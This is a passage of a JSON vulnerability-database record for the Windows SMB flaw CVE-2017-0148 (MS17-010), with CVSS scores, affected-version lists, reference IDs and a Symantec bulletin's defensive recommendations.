https://t.co/6jaCHwnUja?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click a trav\u00e9s de /RealTryHackMe"}, {"link": "https://twitter.com/AynRandSucks/status/1429439489068306434", "text": "Blue - I have just completed this room! 
Check it out: https://t.co/Ypt3f3Ra8A?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/0x6d61/status/1430147082573074436", "text": "Blue - I have just completed this room! Check it out: https://t.co/08xRz1yFx7?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click /RealTryHackMe\u3088\u308a"}], "modified": "2021-04-23T00:07:42"}}, "objectVersion": "1.5", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", 
"privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cwe": ["CWE-20"], "scheme": null, "affectedConfiguration": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1511"}, {"cpeName": "microsoft:windows_vista", "name": "microsoft windows vista", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}, {"children": [], "cpe_match": [{"cpe23Uri": 
"cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:gold:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}], "operator": "OR"}], "cpe_match": [], "operator": "AND"}]}, "extraReferences": [{"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf"}, {"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"}, {"name": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "refsource": "MISC", "tags": [], "url": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02"}, {"name": "41987", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/41987/"}, 
{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0146", "refsource": "CONFIRM", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0146"}, {"name": "41891", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/41891/"}, {"name": "43970", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/43970/"}, {"name": "1037991", "refsource": "SECTRACK", "tags": [], "url": "http://www.securitytracker.com/id/1037991"}, {"name": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html"}, {"name": "96707", "refsource": "BID", "tags": [], "url": "http://www.securityfocus.com/bid/96707"}, {"name": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html"}], "immutableFields": []}], "symantec": [{"id": "SMNTC-96706", "hash": "4775340a56904225cdfe843f51e931b56b1c55ac96997708a86791f811c0acb3", "type": "symantec", "bulletinFamily": "software", "title": "Microsoft Windows SMB Server CVE-2017-0148 Remote Code Execution Vulnerability", "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. 
Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8 X64 \n * Microsoft Windows 8 X86 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2003 x64 SP2 \n * Microsoft Windows Server 2003 x86 SP2 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista Service Pack 2 \n * Microsoft Windows Vista x64 Edition Service Pack 2 \n * Microsoft Windows XP Embedded SP3 x86 \n * Microsoft Windows XP Sp2 X64 \n * Microsoft Windows XP Sp3 X86 \n * Unify OpenStage Xpert 6010p 5 \n * Unify OpenStage Xpert 6010p 5R1 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. 
This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not use client software to access unknown or untrusted hosts from critical systems.** \nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references for more information.\n", "published": "2017-03-14T00:00:00", "modified": "2017-03-14T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/96706", "reporter": "Symantec Security Response", "references": ["https://support.microsoft.com/en-in/help/4013389/title", "https://support.microsoft.com/en-in/help/4012598/title", "https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/", "https://www.wired.com/beyond-the-beyond/2017/04/double-pulsar-nsa-leaked-hacks-wild/"], "cvelist": ["CVE-2017-0148"], "lastseen": "2021-06-08T19:05:22", "history": [{"bulletin": {"affectedSoftware": [{"name": "Microsoft Windows 7 for 32-bit Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows Server 2008 for Itanium-based Systems", "operator": "eq", "version": "SP2"}, {"name": "Microsoft Windows Server 2008 R2 for Itanium-based Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows 7 for x64-based Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2012"}, {"name": 
"Microsoft Windows Server 2008 R2 for x64-based Systems", "operator": "eq", "version": "SP1"}, {"name": "Microsoft Windows RT", "operator": "eq", "version": "8.1"}, {"name": "Microsoft Windows Vista x64 Edition", "operator": "eq", "version": "SP2"}, {"name": "Microsoft Windows Server 2012", "operator": "eq", "version": "R2"}, {"name": "Microsoft Windows", "operator": "eq", "version": "Vista SP2"}, {"name": "Microsoft Windows Server 2008 for x64-based Systems", "operator": "eq", "version": "SP2"}, {"name": "Microsoft Windows Server 2008 for 32-bit Systems", "operator": "eq", "version": "SP2"}], "bulletinFamily": "software", "cvelist": ["CVE-2017-0148"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. Failed attacks will cause denial of service conditions. \n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems\n * Microsoft Windows 10 Version 1607 for x64-based Systems\n * Microsoft Windows 10 for 32-bit Systems\n * Microsoft Windows 10 for x64-based Systems\n * Microsoft Windows 10 version 1511 for 32-bit Systems\n * Microsoft Windows 10 version 1511 for x64-based Systems\n * Microsoft Windows 7 for 32-bit Systems SP1\n * Microsoft Windows 7 for x64-based Systems SP1\n * Microsoft Windows 8.1 for 32-bit Systems\n * Microsoft Windows 8.1 for x64-based Systems\n * Microsoft Windows RT 8.1\n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1\n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1\n * Microsoft Windows Server 2008 for 32-bit Systems SP2\n * Microsoft Windows Server 2008 for Itanium-based Systems SP2\n * Microsoft Windows Server 2008 for x64-based Systems SP2\n * Microsoft Windows Server 2012\n * Microsoft Windows Server 2012 R2\n * Microsoft Windows Vista Service Pack 2\n * Microsoft Windows Vista x64 Edition 
Service Pack 2\n\n### Recommendations\n\n#### Run all software as a nonprivileged user with minimal access rights.\n\nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n#### Deploy network intrusion detection systems to monitor network traffic for malicious activity.\n\nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n#### Do not use client software to access unknown or untrusted hosts from critical systems.\n\nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\n#### Implement multiple redundant layers of security.\n\nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities. \n\nUpdates are available. Please see the references for more information. 
\n", "enchantments": {"score": {"modified": "2017-03-15T15:17:01", "value": 9.0}}, "hash": "90b50f664337a8b0d10d7782e03c5593d65f99771e7eba53e441a55495fc47f9", "history": [], "href": "https://www.symantec.com/security_response/vulnerability.jsp?bid=96706", "id": "SMNTC-96706", "lastseen": "2017-03-15T15:17:01", "modified": "2017-03-14T00:00:00", "objectVersion": "1.4", "published": "2017-03-14T00:00:00", "references": [], "reporter": "Symantec Security Response", "title": "Microsoft Windows SMB Server CVE-2017-0148 Remote Code Execution Vulnerability", "type": "symantec", "viewCount": 25}, "differentElements": ["cvss", "references", "description", "href", "affectedSoftware"], "edition": 1, "lastseen": "2017-03-15T15:17:01"}, {"bulletin": {"_object_type": "robots.models.symantec.SymantecBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.symantec.SymantecBulletin"], "affectedSoftware": [{"name": "Microsoft Windows", "operator": "eq", "version": "10 Version 1607 for x64-based Systems "}, {"name": "Unify OpenStage Xpert", "operator": "eq", "version": "6010p 5R1 "}, {"name": "Microsoft Windows Vista x64 Edition Service Pack", "operator": "eq", "version": "2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8 X64 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2012 R2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2003 x64 SP2 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 R2 for x64-based Systems SP1 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 Version 1607 for 32-bit Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2003 x86 SP2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8.1 for 32-bit Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 for 32-bit Systems SP2 "}, 
{"name": "Microsoft Windows Vista Service Pack", "operator": "eq", "version": "2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 for 32-bit Systems "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8 X86 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 version 1511 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2012 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "7 for 32-bit Systems SP1 "}, {"name": "Unify OpenStage Xpert", "operator": "eq", "version": "6010p 5 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 for x64-based Systems SP2 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "10 version 1511 for 32-bit Systems "}, {"name": "Microsoft Windows", "operator": "eq", "version": "7 for x64-based Systems SP1 "}, {"name": "Microsoft Windows", "operator": "eq", "version": "8.1 for x64-based Systems "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 for Itanium-based Systems SP2 "}, {"name": "Microsoft Windows RT", "operator": "eq", "version": "8.1 "}, {"name": "Microsoft Windows Server", "operator": "eq", "version": "2008 R2 for Itanium-based Systems SP1 "}], "bulletinFamily": "software", "cvelist": ["CVE-2017-0148"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. 
Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8 X64 \n * Microsoft Windows 8 X86 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2003 x64 SP2 \n * Microsoft Windows Server 2003 x86 SP2 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista Service Pack 2 \n * Microsoft Windows Vista x64 Edition Service Pack 2 \n * Microsoft Windows XP Embedded SP3 x86 \n * Microsoft Windows XP Sp2 X64 \n * Microsoft Windows XP Sp3 X86 \n * Unify OpenStage Xpert 6010p 5 \n * Unify OpenStage Xpert 6010p 5R1 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. 
This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not use client software to access unknown or untrusted hosts from critical systems.** \nDue to the nature of this issue, avoid using the client application to connect to unknown or untrusted hosts.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references for more information.\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2018-03-13T14:30:45", "references": [{"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": 
["THN:18A54BDD63D7DC2B3284D326E6510150"], "type": "thn"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["MS:CVE-2017-0148"], "type": "mscve"}, {"idList": ["CVE-2017-0148"], "type": "cve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2018-03-13T14:30:45", "rev": 2, "value": 8.3, "vector": "NONE"}}, "hash": "a1c574707536007228601a6892ce381406ff4b4a1f4f64dc4bfe2402115c6bd1", "hashmap": [{"hash": "0ceb24f9631084ba620bf1a65ce8dd09", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "b8d2e9770277e4a8198efeee8a25dfbc", "key": "modified"}, {"hash": "dee2d346525c42556b1833b21cb142d8", "key": "_object_types"}, {"hash": "ae9f420b26fd277e3efcc881d7d236ae", "key": "description"}, {"hash": "52e3bbafc627009ac13caff1200a0dbf", "key": "type"}, {"hash": "7d544338a938ae7978c04bbbfd191f84", "key": "href"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "38af5596de2fce76e4eb62aa066bbcdb", "key": "_object_type"}, {"hash": "74af08e9aed061e2c0200c647772ba4c", "key": "title"}, {"hash": "b8d2e9770277e4a8198efeee8a25dfbc", "key": "published"}, {"hash": "12432522d29cb6b9b409867cd87e588e", "key": "references"}, {"hash": "d6218597dc7a1b025a781373296b2b63", "key": "reporter"}, {"hash": "b99edf73073813cd4c0252d2eb2a41b1", "key": "cvelist"}], 
"history": [], "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/96706", "id": "SMNTC-96706", "immutableFields": [], "lastseen": "2018-03-13T14:30:45", "modified": "2017-03-14T00:00:00", "objectVersion": "1.5", "published": "2017-03-14T00:00:00", "references": ["https://support.microsoft.com/en-in/help/4013389/title", "https://support.microsoft.com/en-in/help/4012598/title", "https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/", "https://www.wired.com/beyond-the-beyond/2017/04/double-pulsar-nsa-leaked-hacks-wild/"], "reporter": "Symantec Security Response", "title": "Microsoft Windows SMB Server CVE-2017-0148 Remote Code Execution Vulnerability", "type": "symantec", "viewCount": 63}, "different_elements": ["affectedSoftware"], "edition": 1, "lastseen": "2018-03-13T14:30:45"}], "viewCount": 65, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "metasploit", "idList": 
["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-06-08T19:05:22", "rev": 2}, "score": {"value": 8.3, "vector": "NONE", "modified": "2021-06-08T19:05:22", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [{"name": "unify openstage xpert", "operator": "eq", "version": "6010p 5 "}, {"name": "microsoft windows", "operator": "eq", "version": "8.1 for 32-bit Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "7 for x64-based Systems SP1 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 Version 1607 for 32-bit Systems "}, {"name": "microsoft windows vista x64 edition service pack", "operator": "eq", "version": "2 "}, {"name": "microsoft windows", "operator": "eq", "version": "7 for 32-bit Systems SP1 "}, {"name": "microsoft windows", "operator": "eq", "version": "8 X64 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 for 32-bit Systems SP2 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2012 R2 "}, {"name": "microsoft windows", "operator": "eq", 
"version": "10 Version 1607 for x64-based Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "10 for x64-based Systems "}, {"name": "microsoft windows server", "operator": "eq", "version": "2003 x86 SP2 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2012 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 version 1511 for 32-bit Systems "}, {"name": "microsoft windows", "operator": "eq", "version": "8.1 for x64-based Systems "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 R2 for x64-based Systems SP1 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2003 x64 SP2 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 R2 for Itanium-based Systems SP1 "}, {"name": "unify openstage xpert", "operator": "eq", "version": "6010p 5R1 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 for x64-based Systems SP2 "}, {"name": "microsoft windows rt", "operator": "eq", "version": "8.1 "}, {"name": "microsoft windows server", "operator": "eq", "version": "2008 for Itanium-based Systems SP2 "}, {"name": "microsoft windows", "operator": "eq", "version": "10 version 1511 for x64-based Systems "}, {"name": "microsoft windows", "operator": 